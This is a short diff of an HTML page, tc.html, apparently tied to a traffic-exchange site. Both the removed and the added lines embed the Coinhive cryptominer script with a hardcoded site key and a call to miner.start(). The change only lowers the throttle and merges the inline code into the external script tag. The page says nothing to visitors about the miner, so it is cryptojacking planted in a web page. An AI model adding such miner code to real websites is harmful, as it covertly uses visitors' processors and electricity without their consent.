--- a/tc.html
+++ b/tc.html
@@ -1,9 +1,8 @@
 <html>
 <head>
 <!--old metod-->
-<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
-<script>
-    var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.3});
+<script src="https://coin-hive.com/lib/coinhive.min.js">
+    var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});
     miner.start();
 </script>
 <!--<meta content="EVERYDAYHITS.ORG" property="og:site_name">-->
